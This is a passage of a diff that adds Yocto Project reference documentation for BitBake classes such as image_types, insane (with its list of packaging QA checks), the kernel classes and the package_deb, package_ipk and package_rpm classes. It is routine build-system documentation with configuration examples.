+:term:`IMAGE_FSTYPES` variable. You can use this
+class as a reference on how to add support for custom image output
+types.
+
+By default, the :ref:`image <ref-classes-image>` class automatically
+enables the ``image_types`` class. The ``image`` class uses the
+``IMGCLASSES`` variable as follows:
+::
+
+   IMGCLASSES = "rootfs_${IMAGE_PKGTYPE} image_types ${IMAGE_CLASSES}"
+   IMGCLASSES += "${@['populate_sdk_base', 'populate_sdk_ext']['linux' in d.getVar("SDK_OS")]}"
+   IMGCLASSES += "${@bb.utils.contains_any('IMAGE_FSTYPES', 'live iso hddimg', 'image-live', '', d)}"
+   IMGCLASSES += "${@bb.utils.contains('IMAGE_FSTYPES', 'container', 'image-container', '', d)}"
+   IMGCLASSES += "image_types_wic"
+   IMGCLASSES += "rootfs-postcommands"
+   IMGCLASSES += "image-postinst-intercepts"
+   inherit ${IMGCLASSES}
+
+The ``image_types`` class also handles conversion and compression of images.
+
+.. note::
+
+   To build a VMware VMDK image, you need to add "wic.vmdk" to
+   ``IMAGE_FSTYPES``. This would also be similar for Virtual Box Virtual Disk
+   Image ("vdi") and QEMU Copy On Write Version 2 ("qcow2") images.
+
+.. _ref-classes-image-live:
+
+``image-live.bbclass``
+======================
+
+This class controls building "live" (i.e. HDDIMG and ISO) images. Live
+images contain syslinux for legacy booting, as well as the bootloader
+specified by :term:`EFI_PROVIDER` if
+:term:`MACHINE_FEATURES` contains "efi".
+
+Normally, you do not use this class directly. Instead, you add "live" to
+:term:`IMAGE_FSTYPES`.
+
+.. _ref-classes-image-mklibs:
+
+``image-mklibs.bbclass``
+========================
+
+The ``image-mklibs`` class enables the use of the ``mklibs`` utility
+during the :ref:`ref-tasks-rootfs` task, which optimizes
+the size of libraries contained in the image.
+
+By default, the class is enabled in the ``local.conf.template`` using
+the :term:`USER_CLASSES` variable as follows:
+::
+
+   USER_CLASSES ?= "buildstats image-mklibs image-prelink"
+
+.. _ref-classes-image-prelink:
+
+``image-prelink.bbclass``
+=========================
+
+The ``image-prelink`` class enables the use of the ``prelink`` utility
+during the :ref:`ref-tasks-rootfs` task, which optimizes
+the dynamic linking of shared libraries to reduce executable startup
+time.
+
+By default, the class is enabled in the ``local.conf.template`` using
+the :term:`USER_CLASSES` variable as follows:
+::
+
+   USER_CLASSES ?= "buildstats image-mklibs image-prelink"
+
+.. _ref-classes-insane:
+
+``insane.bbclass``
+==================
+
+The ``insane`` class adds a step to the package generation process so
+that output quality assurance checks are generated by the OpenEmbedded
+build system. A range of checks are performed that check the build's
+output for common problems that show up during runtime. Distribution
+policy usually dictates whether to include this class.
+
+You can configure the sanity checks so that specific test failures
+either raise a warning or an error message. Typically, failures for new
+tests generate a warning. Subsequent failures for the same test would
+then generate an error message once the metadata is in a known and good
+condition. See the ":doc:`ref-qa-checks`" Chapter for a list of all the warning
+and error messages you might encounter using a default configuration.
+
+Use the :term:`WARN_QA` and
+:term:`ERROR_QA` variables to control the behavior of
+these checks at the global level (i.e. in your custom distro
+configuration). However, to skip one or more checks in recipes, you
+should use :term:`INSANE_SKIP`. For example, to skip
+the check for symbolic link ``.so`` files in the main package of a
+recipe, add the following to the recipe. You need to realize that the
+package name override, in this example ``${PN}``, must be used:
+::
+
+   INSANE_SKIP_${PN} += "dev-so"
+
+Please keep in mind that the QA checks
+exist in order to detect real or potential problems in the packaged
+output. So exercise caution when disabling these checks.
+
+The following list shows the tests you can list with the ``WARN_QA`` and
+``ERROR_QA`` variables:
+
+-  ``already-stripped:`` Checks that produced binaries have not
+   already been stripped prior to the build system extracting debug
+   symbols. It is common for upstream software projects to default to
+   stripping debug symbols for output binaries. In order for debugging
+   to work on the target using ``-dbg`` packages, this stripping must be
+   disabled.
+
+-  ``arch:`` Checks the Executable and Linkable Format (ELF) type, bit
+   size, and endianness of any binaries to ensure they match the target
+   architecture. This test fails if any binaries do not match the type
+   since there would be an incompatibility. The test could indicate that
+   the wrong compiler or compiler options have been used. Sometimes
+   software, like bootloaders, might need to bypass this check.
+
+-  ``buildpaths:`` Checks for paths to locations on the build host
+   inside the output files. Currently, this test triggers too many false
+   positives and thus is not normally enabled.
+
+-  ``build-deps:`` Determines if a build-time dependency that is
+   specified through :term:`DEPENDS`, explicit
+   :term:`RDEPENDS`, or task-level dependencies exists
+   to match any runtime dependency. This determination is particularly
+   useful to discover where runtime dependencies are detected and added
+   during packaging. If no explicit dependency has been specified within
+   the metadata, at the packaging stage it is too late to ensure that
+   the dependency is built, and thus you can end up with an error when
+   the package is installed into the image during the
+   :ref:`ref-tasks-rootfs` task because the auto-detected
+   dependency was not satisfied. An example of this would be where the
+   :ref:`update-rc.d <ref-classes-update-rc.d>` class automatically
+   adds a dependency on the ``initscripts-functions`` package to
+   packages that install an initscript that refers to
+   ``/etc/init.d/functions``. The recipe should really have an explicit
+   ``RDEPENDS`` for the package in question on ``initscripts-functions``
+   so that the OpenEmbedded build system is able to ensure that the
+   ``initscripts`` recipe is actually built and thus the
+   ``initscripts-functions`` package is made available.
+
+-  ``compile-host-path:`` Checks the
+   :ref:`ref-tasks-compile` log for indications that
+   paths to locations on the build host were used. Using such paths
+   might result in host contamination of the build output.
+
+-  ``debug-deps:`` Checks that all packages except ``-dbg`` packages
+   do not depend on ``-dbg`` packages, which would cause a packaging
+   bug.
+
+-  ``debug-files:`` Checks for ``.debug`` directories in anything but
+   the ``-dbg`` package. The debug files should all be in the ``-dbg``
+   package. Thus, anything packaged elsewhere is incorrect packaging.
+
+-  ``dep-cmp:`` Checks for invalid version comparison statements in
+   runtime dependency relationships between packages (i.e. in
+   :term:`RDEPENDS`,
+   :term:`RRECOMMENDS`,
+   :term:`RSUGGESTS`,
+   :term:`RPROVIDES`,
+   :term:`RREPLACES`, and
+   :term:`RCONFLICTS` variable values). Any invalid
+   comparisons might trigger failures or undesirable behavior when
+   passed to the package manager.
+
+-  ``desktop:`` Runs the ``desktop-file-validate`` program against any
+   ``.desktop`` files to validate their contents against the
+   specification for ``.desktop`` files.
+
+-  ``dev-deps:`` Checks that all packages except ``-dev`` or
+   ``-staticdev`` packages do not depend on ``-dev`` packages, which
+   would be a packaging bug.
+
+-  ``dev-so:`` Checks that the ``.so`` symbolic links are in the
+   ``-dev`` package and not in any of the other packages. In general,
+   these symlinks are only useful for development purposes. Thus, the
+   ``-dev`` package is the correct location for them. Some very rare
+   cases do exist for dynamically loaded modules where these symlinks
+   are needed instead in the main package.
+
+-  ``file-rdeps:`` Checks that file-level dependencies identified by
+   the OpenEmbedded build system at packaging time are satisfied. For
+   example, a shell script might start with the line ``#!/bin/bash``.
+   This line would translate to a file dependency on ``/bin/bash``. Of
+   the three package managers that the OpenEmbedded build system
+   supports, only RPM directly handles file-level dependencies,
+   resolving them automatically to packages providing the files.
+   However, the lack of that functionality in the other two package
+   managers does not mean the dependencies do not still need resolving.
+   This QA check attempts to ensure that explicitly declared
+   :term:`RDEPENDS` exist to handle any file-level
+   dependency detected in packaged files.
+
+-  ``files-invalid:`` Checks for :term:`FILES` variable
+   values that contain "//", which is invalid.
+
+-  ``host-user-contaminated:`` Checks that no package produced by the
+   recipe contains any files outside of ``/home`` with a user or group
+   ID that matches the user running BitBake. A match usually indicates
+   that the files are being installed with an incorrect UID/GID, since
+   target IDs are independent from host IDs. For additional information,
+   see the section describing the
+   :ref:`ref-tasks-install` task.
+
+-  ``incompatible-license:`` Report when packages are excluded from
+   being created due to being marked with a license that is in
+   :term:`INCOMPATIBLE_LICENSE`.
+
+-  ``install-host-path:`` Checks the
+   :ref:`ref-tasks-install` log for indications that
+   paths to locations on the build host were used. Using such paths
+   might result in host contamination of the build output.
+
+-  ``installed-vs-shipped:`` Reports when files have been installed
+   within ``do_install`` but have not been included in any package by
+   way of the :term:`FILES` variable. Files that do not
+   appear in any package cannot be present in an image later on in the
+   build process. Ideally, all installed files should be packaged or not
+   installed at all. These files can be deleted at the end of
+   ``do_install`` if the files are not needed in any package.
+
+-  ``invalid-chars:`` Checks that the recipe metadata variables
+   :term:`DESCRIPTION`,
+   :term:`SUMMARY`, :term:`LICENSE`, and
+   :term:`SECTION` do not contain non-UTF-8 characters.
+   Some package managers do not support such characters.
+
+-  ``invalid-packageconfig:`` Checks that no undefined features are
+   being added to :term:`PACKAGECONFIG`. For
+   example, any name "foo" for which the following form does not exist:
+   ::
+
+      PACKAGECONFIG[foo] = "..."
+
+-  ``la:`` Checks ``.la`` files for any ``TMPDIR`` paths. Any ``.la``
+   file containing these paths is incorrect since ``libtool`` adds the
+   correct sysroot prefix when using the files automatically itself.
+
+-  ``ldflags:`` Ensures that the binaries were linked with the
+   :term:`LDFLAGS` options provided by the build system.
+   If this test fails, check that the ``LDFLAGS`` variable is being
+   passed to the linker command.
+
+-  ``libdir:`` Checks for libraries being installed into incorrect
+   (possibly hardcoded) installation paths. For example, this test will
+   catch recipes that install ``/lib/bar.so`` when ``${base_libdir}`` is
+   "lib32". Another example is when recipes install
+   ``/usr/lib64/foo.so`` when ``${libdir}`` is "/usr/lib".
+
+-  ``libexec:`` Checks if a package contains files in
+   ``/usr/libexec``. This check is not performed if the ``libexecdir``
+   variable has been set explicitly to ``/usr/libexec``.
+
+-  ``packages-list:`` Checks for the same package being listed
+   multiple times through the :term:`PACKAGES` variable
+   value. Installing the package in this manner can cause errors during
+   packaging.
+
+-  ``perm-config:`` Reports lines in ``fs-perms.txt`` that have an
+   invalid format.
+
+-  ``perm-line:`` Reports lines in ``fs-perms.txt`` that have an
+   invalid format.
+
+-  ``perm-link:`` Reports lines in ``fs-perms.txt`` that specify
+   'link' where the specified target already exists.
+
+-  ``perms:`` Currently, this check is unused but reserved.
+
+-  ``pkgconfig:`` Checks ``.pc`` files for any
+   :term:`TMPDIR`/:term:`WORKDIR` paths.
+   Any ``.pc`` file containing these paths is incorrect since
+   ``pkg-config`` itself adds the correct sysroot prefix when the files
+   are accessed.
+
+-  ``pkgname:`` Checks that all packages in
+   :term:`PACKAGES` have names that do not contain
+   invalid characters (i.e. characters other than 0-9, a-z, ., +, and
+   -).
+
+-  ``pkgv-undefined:`` Checks to see if the ``PKGV`` variable is
+   undefined during :ref:`ref-tasks-package`.
+
+-  ``pkgvarcheck:`` Checks through the variables
+   :term:`RDEPENDS`,
+   :term:`RRECOMMENDS`,
+   :term:`RSUGGESTS`,
+   :term:`RCONFLICTS`,
+   :term:`RPROVIDES`,
+   :term:`RREPLACES`, :term:`FILES`,
+   :term:`ALLOW_EMPTY`, ``pkg_preinst``,
+   ``pkg_postinst``, ``pkg_prerm`` and ``pkg_postrm``, and reports if
+   there are variable sets that are not package-specific. Using these
+   variables without a package suffix is bad practice, and might
+   unnecessarily complicate dependencies of other packages within the
+   same recipe or have other unintended consequences.
+
+-  ``pn-overrides:`` Checks that a recipe does not have a name
+   (:term:`PN`) value that appears in
+   :term:`OVERRIDES`. If a recipe is named such that
+   its ``PN`` value matches something already in ``OVERRIDES`` (e.g.
+   ``PN`` happens to be the same as :term:`MACHINE` or
+   :term:`DISTRO`), it can have unexpected consequences.
+   For example, assignments such as ``FILES_${PN} = "xyz"`` effectively
+   turn into ``FILES = "xyz"``.
+
+-  ``rpaths:`` Checks for rpaths in the binaries that contain build
+   system paths such as ``TMPDIR``. If this test fails, bad ``-rpath``
+   options are being passed to the linker commands and your binaries
+   have potential security issues.
+
+-  ``split-strip:`` Reports that splitting or stripping debug symbols
+   from binaries has failed.
+
+-  ``staticdev:`` Checks for static library files (``*.a``) in
+   non-``staticdev`` packages.
+
+-  ``symlink-to-sysroot:`` Checks for symlinks in packages that point
+   into :term:`TMPDIR` on the host. Such symlinks will
+   work on the host, but are clearly invalid when running on the target.
+
+-  ``textrel:`` Checks for ELF binaries that contain relocations in
+   their ``.text`` sections, which can result in a performance impact at
+   runtime. See the explanation for the ``ELF binary`` message in
+   ":doc:`ref-qa-checks`" for more information regarding runtime performance
+   issues.
+
+-  ``unlisted-pkg-lics:`` Checks that all declared licenses applying
+   for a package are also declared on the recipe level (i.e. any license
+   in ``LICENSE_*`` should appear in :term:`LICENSE`).
+
+-  ``useless-rpaths:`` Checks for dynamic library load paths (rpaths)
+   in the binaries that by default on a standard system are searched by
+   the linker (e.g. ``/lib`` and ``/usr/lib``). While these paths will
+   not cause any breakage, they do waste space and are unnecessary.
+
+-  ``var-undefined:`` Reports when variables fundamental to packaging
+   (i.e. :term:`WORKDIR`,
+   :term:`DEPLOY_DIR`, :term:`D`,
+   :term:`PN`, and :term:`PKGD`) are undefined
+   during :ref:`ref-tasks-package`.
+
+-  ``version-going-backwards:`` If Build History is enabled, reports
+   when a package being written out has a lower version than the
+   previously written package under the same name. If you are placing
+   output packages into a feed and upgrading packages on a target system
+   using that feed, the version of a package going backwards can result
+   in the target system not correctly upgrading to the "new" version of
+   the package.
+
+   .. note::
+
+      If you are not using runtime package management on your target
+      system, then you do not need to worry about this situation.
+
+-  ``xorg-driver-abi:`` Checks that all packages containing Xorg
+   drivers have ABI dependencies. The ``xserver-xorg`` recipe provides
+   driver ABI names. All drivers should depend on the ABI versions that
+   they have been built against. Driver recipes that include
+   ``xorg-driver-input.inc`` or ``xorg-driver-video.inc`` will
+   automatically get these versions. Consequently, you should only need
+   to explicitly add dependencies to binary driver recipes.
+
+.. _ref-classes-kernel:
+
+``kernel.bbclass``
+==================
+
+The ``kernel`` class handles building Linux kernels. The class contains
+code to build all kernel trees. All needed headers are staged into the
+``STAGING_KERNEL_DIR`` directory to allow out-of-tree module builds
+using the :ref:`module <ref-classes-module>` class.
+
+This means that each built kernel module is packaged separately and
+inter-module dependencies are created by parsing the ``modinfo`` output.
+If all modules are required, then installing the ``kernel-modules``
+package installs all packages with modules and various other kernel
+packages such as ``kernel-vmlinux``.
+
+The ``kernel`` class contains logic that allows you to embed an initial
+RAM filesystem (initramfs) image when you build the kernel image. For
+information on how to build an initramfs, see the
+":ref:`building-an-initramfs-image`" section in
+the Yocto Project Development Tasks Manual.
+
+Various other classes are used by the ``kernel`` and ``module`` classes
+internally including the :ref:`kernel-arch <ref-classes-kernel-arch>`,
+:ref:`module-base <ref-classes-module-base>`, and
+:ref:`linux-kernel-base <ref-classes-linux-kernel-base>` classes.
+
+.. _ref-classes-kernel-arch:
+
+``kernel-arch.bbclass``
+=======================
+
+The ``kernel-arch`` class sets the ``ARCH`` environment variable for
+Linux kernel compilation (including modules).
+
+.. _ref-classes-kernel-devicetree:
+
+``kernel-devicetree.bbclass``
+=============================
+
+The ``kernel-devicetree`` class, which is inherited by the
+:ref:`kernel <ref-classes-kernel>` class, supports device tree
+generation.
+
+.. _ref-classes-kernel-fitimage:
+
+``kernel-fitimage.bbclass``
+===========================
+
+The ``kernel-fitimage`` class provides support to pack a kernel Image,
+device trees and a RAM disk into a single FIT image. In theory, a FIT
+image can support any number of kernels, RAM disks and device-trees.
+However, ``kernel-fitimage`` currently only supports
+limited usescases: just one kernel image, an optional RAM disk, and
+any number of device tree.
+
+To create a FIT image, it is required that :term:`KERNEL_CLASSES`
+is set to "kernel-fitimage" and :term:`KERNEL_IMAGETYPE`
+is set to "fitImage".
+
+The options for the device tree compiler passed to mkimage -D feature
+when creating the FIT image are specified using the
+:term:`UBOOT_MKIMAGE_DTCOPTS` variable.
+
+Only a single kernel can be added to the FIT image created by
+``kernel-fitimage`` and the kernel image in FIT is mandatory. The
+address where the kernel image is to be loaded by U-boot is
+specified by :term:`UBOOT_LOADADDRESS` and the entrypoint by
+:term:`UBOOT_ENTRYPOINT`.
+
+Multiple device trees can be added to the FIT image created by
+``kernel-fitimage`` and the device tree is optional.
+The address where the device tree is to be loaded by U-boot is
+specified by :term:`UBOOT_DTBO_LOADADDRESS` for device tree overlays
+and by :term:`UBOOT_DTB_LOADADDRESS` for device tree binaries.
+
+Only a single RAM disk can be added to the FIT image created by
+``kernel-fitimage`` and the RAM disk in FIT is optional.
+The address where the RAM disk image is to be loaded by U-boot
+is specified by :term:`UBOOT_RD_LOADADDRESS` and the entrypoint by
+:term:`UBOOT_RD_ENTRYPOINT`. The ramdisk is added to FIT image when
+:term:`INITRAMFS_IMAGE` is specified.
+
+The FIT image generated by ``kernel-fitimage`` class is signed when the
+variables :term:`UBOOT_SIGN_ENABLE`, :term:`UBOOT_MKIMAGE_DTCOPTS`,
+:term:`UBOOT_SIGN_KEYDIR` and :term:`UBOOT_SIGN_KEYNAME` are set
+appropriately. The default values used for :term:`FIT_HASH_ALG` and
+:term:`FIT_SIGN_ALG` in ``kernel-fitimage`` are "sha256" and
+"rsa2048" respectively.
+
+
+.. _ref-classes-kernel-grub:
+
+``kernel-grub.bbclass``
+=======================
+
+The ``kernel-grub`` class updates the boot area and the boot menu with
+the kernel as the priority boot mechanism while installing a RPM to
+update the kernel on a deployed target.
+
+.. _ref-classes-kernel-module-split:
+
+``kernel-module-split.bbclass``
+===============================
+
+The ``kernel-module-split`` class provides common functionality for
+splitting Linux kernel modules into separate packages.
+
+.. _ref-classes-kernel-uboot:
+
+``kernel-uboot.bbclass``
+========================
+
+The ``kernel-uboot`` class provides support for building from
+vmlinux-style kernel sources.
+
+.. _ref-classes-kernel-uimage:
+
+``kernel-uimage.bbclass``
+=========================
+
+The ``kernel-uimage`` class provides support to pack uImage.
+
+.. _ref-classes-kernel-yocto:
+
+``kernel-yocto.bbclass``
+========================
+
+The ``kernel-yocto`` class provides common functionality for building
+from linux-yocto style kernel source repositories.
+
+.. _ref-classes-kernelsrc:
+
+``kernelsrc.bbclass``
+=====================
+
+The ``kernelsrc`` class sets the Linux kernel source and version.
+
+.. _ref-classes-lib_package:
+
+``lib_package.bbclass``
+=======================
+
+The ``lib_package`` class supports recipes that build libraries and
+produce executable binaries, where those binaries should not be
+installed by default along with the library. Instead, the binaries are
+added to a separate ``${``\ :term:`PN`\ ``}-bin`` package to
+make their installation optional.
+
+.. _ref-classes-libc*:
+
+``libc*.bbclass``
+=================
+
+The ``libc*`` classes support recipes that build packages with ``libc``:
+
+-  The ``libc-common`` class provides common support for building with
+   ``libc``.
+
+-  The ``libc-package`` class supports packaging up ``glibc`` and
+   ``eglibc``.
+
+.. _ref-classes-license:
+
+``license.bbclass``
+===================
+
+The ``license`` class provides license manifest creation and license
+exclusion. This class is enabled by default using the default value for
+the :term:`INHERIT_DISTRO` variable.
+
+.. _ref-classes-linux-kernel-base:
+
+``linux-kernel-base.bbclass``
+=============================
+
+The ``linux-kernel-base`` class provides common functionality for
+recipes that build out of the Linux kernel source tree. These builds
+goes beyond the kernel itself. For example, the Perf recipe also
+inherits this class.
+
+.. _ref-classes-linuxloader:
+
+``linuxloader.bbclass``
+=======================
+
+Provides the function ``linuxloader()``, which gives the value of the
+dynamic loader/linker provided on the platform. This value is used by a
+number of other classes.
+
+.. _ref-classes-logging:
+
+``logging.bbclass``
+===================
+
+The ``logging`` class provides the standard shell functions used to log
+messages for various BitBake severity levels (i.e. ``bbplain``,
+``bbnote``, ``bbwarn``, ``bberror``, ``bbfatal``, and ``bbdebug``).
+
+This class is enabled by default since it is inherited by the ``base``
+class.
+
+.. _ref-classes-meta:
+
+``meta.bbclass``
+================
+
+The ``meta`` class is inherited by recipes that do not build any output
+packages themselves, but act as a "meta" target for building other
+recipes.
+
+.. _ref-classes-metadata_scm:
+
+``metadata_scm.bbclass``
+========================
+
+The ``metadata_scm`` class provides functionality for querying the
+branch and revision of a Source Code Manager (SCM) repository.
+
+The :ref:`base <ref-classes-base>` class uses this class to print the
+revisions of each layer before starting every build. The
+``metadata_scm`` class is enabled by default because it is inherited by
+the ``base`` class.
+
+.. _ref-classes-migrate_localcount:
+
+``migrate_localcount.bbclass``
+==============================
+
+The ``migrate_localcount`` class verifies a recipe's localcount data and
+increments it appropriately.
+
+.. _ref-classes-mime:
+
+``mime.bbclass``
+================
+
+The ``mime`` class generates the proper post-install and post-remove
+(postinst/postrm) scriptlets for packages that install MIME type files.
+These scriptlets call ``update-mime-database`` to add the MIME types to
+the shared database.
+
+.. _ref-classes-mirrors:
+
+``mirrors.bbclass``
+===================
+
+The ``mirrors`` class sets up some standard
+:term:`MIRRORS` entries for source code mirrors. These
+mirrors provide a fall-back path in case the upstream source specified
+in :term:`SRC_URI` within recipes is unavailable.
+
+This class is enabled by default since it is inherited by the
+:ref:`base <ref-classes-base>` class.
+
+.. _ref-classes-module:
+
+``module.bbclass``
+==================
+
+The ``module`` class provides support for building out-of-tree Linux
+kernel modules. The class inherits the
+:ref:`module-base <ref-classes-module-base>` and
+:ref:`kernel-module-split <ref-classes-kernel-module-split>` classes,
+and implements the :ref:`ref-tasks-compile` and
+:ref:`ref-tasks-install` tasks. The class provides
+everything needed to build and package a kernel module.
+
+For general information on out-of-tree Linux kernel modules, see the
+":ref:`kernel-dev/kernel-dev-common:incorporating out-of-tree modules`"
+section in the Yocto Project Linux Kernel Development Manual.
+
+.. _ref-classes-module-base:
+
+``module-base.bbclass``
+=======================
+
+The ``module-base`` class provides the base functionality for building
+Linux kernel modules. Typically, a recipe that builds software that
+includes one or more kernel modules and has its own means of building
+the module inherits this class as opposed to inheriting the
+:ref:`module <ref-classes-module>` class.
+
+.. _ref-classes-multilib*:
+
+``multilib*.bbclass``
+=====================
+
+The ``multilib*`` classes provide support for building libraries with
+different target optimizations or target architectures and installing
+them side-by-side in the same image.
+
+For more information on using the Multilib feature, see the
+":ref:`combining-multiple-versions-library-files-into-one-image`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-classes-native:
+
+``native.bbclass``
+==================
+
+The ``native`` class provides common functionality for recipes that
+build tools to run on the :term:`Build Host` (i.e. tools that use the compiler
+or other tools from the build host).
+
+You can create a recipe that builds tools that run natively on the host
+a couple different ways:
+
+-  Create a myrecipe\ ``-native.bb`` recipe that inherits the ``native``
+   class. If you use this method, you must order the inherit statement
+   in the recipe after all other inherit statements so that the
+   ``native`` class is inherited last.
+
+   .. note::
+
+      When creating a recipe this way, the recipe name must follow this
+      naming convention:
+      ::
+
+         myrecipe-native.bb
+
+
+      Not using this naming convention can lead to subtle problems
+      caused by existing code that depends on that naming convention.
+
+-  Create or modify a target recipe that contains the following:
+   ::
+
+      BBCLASSEXTEND = "native"
+
+   Inside the
+   recipe, use ``_class-native`` and ``_class-target`` overrides to
+   specify any functionality specific to the respective native or target
+   case.
+
+Although applied differently, the ``native`` class is used with both
+methods. The advantage of the second method is that you do not need to
+have two separate recipes (assuming you need both) for native and
+target. All common parts of the recipe are automatically shared.
+
+.. _ref-classes-nativesdk:
+
+``nativesdk.bbclass``
+=====================
+
+The ``nativesdk`` class provides common functionality for recipes that
+wish to build tools to run as part of an SDK (i.e. tools that run on
+:term:`SDKMACHINE`).
+
+You can create a recipe that builds tools that run on the SDK machine a
+couple different ways:
+
+-  Create a ``nativesdk-``\ myrecipe\ ``.bb`` recipe that inherits the
+   ``nativesdk`` class. If you use this method, you must order the
+   inherit statement in the recipe after all other inherit statements so
+   that the ``nativesdk`` class is inherited last.
+
+-  Create a ``nativesdk`` variant of any recipe by adding the following:
+   ::
+
+       BBCLASSEXTEND = "nativesdk"
+
+   Inside the
+   recipe, use ``_class-nativesdk`` and ``_class-target`` overrides to
+   specify any functionality specific to the respective SDK machine or
+   target case.
+
+.. note::
+
+   When creating a recipe, you must follow this naming convention:
+   ::
+
+           nativesdk-myrecipe.bb
+
+
+   Not doing so can lead to subtle problems because code exists that
+   depends on the naming convention.
+
+Although applied differently, the ``nativesdk`` class is used with both
+methods. The advantage of the second method is that you do not need to
+have two separate recipes (assuming you need both) for the SDK machine
+and the target. All common parts of the recipe are automatically shared.
+
+.. _ref-classes-nopackages:
+
+``nopackages.bbclass``
+======================
+
+Disables packaging tasks for those recipes and classes where packaging
+is not needed.
+
+.. _ref-classes-npm:
+
+``npm.bbclass``
+===============
+
+Provides support for building Node.js software fetched using the `node
+package manager (NPM) <https://en.wikipedia.org/wiki/Npm_(software)>`__.
+
+.. note::
+
+   Currently, recipes inheriting this class must use the ``npm://``
+   fetcher to have dependencies fetched and packaged automatically.
+
+For information on how to create NPM packages, see the
+":ref:`dev-manual/dev-manual-common-tasks:creating node package manager (npm) packages`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-classes-oelint:
+
+``oelint.bbclass``
+==================
+
+The ``oelint`` class is an obsolete lint checking tool that exists in
+``meta/classes`` in the :term:`Source Directory`.
+
+A number of classes exist that could be generally useful in OE-Core but
+are never actually used within OE-Core itself. The ``oelint`` class is
+one such example. However, being aware of this class can reduce the
+proliferation of different versions of similar classes across multiple
+layers.
+
+.. _ref-classes-own-mirrors:
+
+``own-mirrors.bbclass``
+=======================
+
+The ``own-mirrors`` class makes it easier to set up your own
+:term:`PREMIRRORS` from which to first fetch source
+before attempting to fetch it from the upstream specified in
+:term:`SRC_URI` within each recipe.
+
+To use this class, inherit it globally and specify
+:term:`SOURCE_MIRROR_URL`. Here is an example:
+::
+
+   INHERIT += "own-mirrors"
+   SOURCE_MIRROR_URL = "http://example.com/my-source-mirror"
+
+You can specify only a single URL
+in ``SOURCE_MIRROR_URL``.
+
+.. _ref-classes-package:
+
+``package.bbclass``
+===================
+
+The ``package`` class supports generating packages from a build's
+output. The core generic functionality is in ``package.bbclass``. The
+code specific to particular package types resides in these
+package-specific classes:
+:ref:`package_deb <ref-classes-package_deb>`,
+:ref:`package_rpm <ref-classes-package_rpm>`,
+:ref:`package_ipk <ref-classes-package_ipk>`, and
+:ref:`package_tar <ref-classes-package_tar>`.
+
+.. note::
+
+   The
+   package_tar
+   class is broken and not supported. It is recommended that you do not
+   use this class.
+
+You can control the list of resulting package formats by using the
+``PACKAGE_CLASSES`` variable defined in your ``conf/local.conf``
+configuration file, which is located in the :term:`Build Directory`.
+When defining the variable, you can
+specify one or more package types. Since images are generated from
+packages, a packaging class is needed to enable image generation. The
+first class listed in this variable is used for image generation.
+
+If you take the optional step to set up a repository (package feed) on
+the development host that can be used by DNF, you can install packages
+from the feed while you are running the image on the target (i.e.
+runtime installation of packages). For more information, see the
+":ref:`dev-manual/dev-manual-common-tasks:using runtime package management`"
+section in the Yocto Project Development Tasks Manual.
+
+The package-specific class you choose can affect build-time performance
+and has space ramifications. In general, building a package with IPK
+takes about thirty percent less time as compared to using RPM to build
+the same or similar package. This comparison takes into account a
+complete build of the package with all dependencies previously built.
+The reason for this discrepancy is because the RPM package manager
+creates and processes more :term:`Metadata` than the IPK package
+manager. Consequently, you might consider setting ``PACKAGE_CLASSES`` to
+"package_ipk" if you are building smaller systems.
+
+Before making your package manager decision, however, you should
+consider some further things about using RPM:
+
+-  RPM starts to provide more abilities than IPK due to the fact that it
+   processes more Metadata. For example, this information includes
+   individual file types, file checksum generation and evaluation on
+   install, sparse file support, conflict detection and resolution for
+   Multilib systems, ACID style upgrade, and repackaging abilities for
+   rollbacks.
+
+-  For smaller systems, the extra space used for the Berkeley Database
+   and the amount of metadata when using RPM can affect your ability to
+   perform on-device upgrades.
+
+You can find additional information on the effects of the package class
+at these two Yocto Project mailing list links:
+
+-  :yocto_lists:`/pipermail/poky/2011-May/006362.html`
+
+-  :yocto_lists:`/pipermail/poky/2011-May/006363.html`
+
+.. _ref-classes-package_deb:
+
+``package_deb.bbclass``
+=======================
+
+The ``package_deb`` class provides support for creating packages that
+use the Debian (i.e. ``.deb``) file format. The class ensures the
+packages are written out in a ``.deb`` file format to the
+``${``\ :term:`DEPLOY_DIR_DEB`\ ``}`` directory.
+
+This class inherits the :ref:`package <ref-classes-package>` class and
+is enabled through the :term:`PACKAGE_CLASSES`
+variable in the ``local.conf`` file.
+
+.. _ref-classes-package_ipk:
+
+``package_ipk.bbclass``
+=======================
+
+The ``package_ipk`` class provides support for creating packages that
+use the IPK (i.e. ``.ipk``) file format. The class ensures the packages
+are written out in a ``.ipk`` file format to the
+``${``\ :term:`DEPLOY_DIR_IPK`\ ``}`` directory.
+
+This class inherits the :ref:`package <ref-classes-package>` class and
+is enabled through the :term:`PACKAGE_CLASSES`
+variable in the ``local.conf`` file.
+
+.. _ref-classes-package_rpm:
+
+``package_rpm.bbclass``
+=======================
+
+The ``package_rpm`` class provides support for creating packages that
+use the RPM (i.e. ``.rpm``) file format. The class ensures the packages
+are written out in a ``.rpm`` file format to the
+``${``\ :term:`DEPLOY_DIR_RPM`\ ``}`` directory.
+
+This class inherits the :ref:`package <ref-classes-package>` class and
+is enabled through the :term:`PACKAGE_CLASSES`
+variable in the ``local.conf`` file.
+
+.. _ref-classes-package_tar:
+
+``package_tar.bbclass``
+=======================
+
+The ``package_tar`` class provides support for creating tarballs. The
+class ensures the packages are written out in a tarball format to the
+``${``\ :term:`DEPLOY_DIR_TAR`\ ``}`` directory.
+
+This class inherits the :ref:`package <ref-classes-package>` class and
+is enabled through the :term:`PACKAGE_CLASSES`
+variable in the ``local.conf`` file.
+
+.. note::
+
+   You cannot specify the ``package_tar`` class first using the
+   ``PACKAGE_CLASSES`` variable. You must use ``.deb``, ``.ipk``, or ``.rpm``
+   file formats for your image or SDK.
+
+.. _ref-classes-packagedata:
+
+``packagedata.bbclass``
+=======================
+
+The ``packagedata`` class provides common functionality for reading
+``pkgdata`` files found in :term:`PKGDATA_DIR`. These
+files contain information about each output package produced by the
+OpenEmbedded build system.
+
+This class is enabled by default because it is inherited by the
+:ref:`package <ref-classes-package>` class.
+
+.. _ref-classes-packagegroup:
+
+``packagegroup.bbclass``
+========================
+
+The ``packagegroup`` class sets default values appropriate for package
+group recipes (e.g. ``PACKAGES``, ``PACKAGE_ARCH``, ``ALLOW_EMPTY``, and
+so forth). It is highly recommended that all package group recipes
+inherit this class.
+
+For information on how to use this class, see the
+":ref:`usingpoky-extend-customimage-customtasks`"
+section in the Yocto Project Development Tasks Manual.
+
+Previously, this class was called the ``task`` class.
+
+.. _ref-classes-patch:
+
+``patch.bbclass``
+=================
+
+The ``patch`` class provides all functionality for applying patches
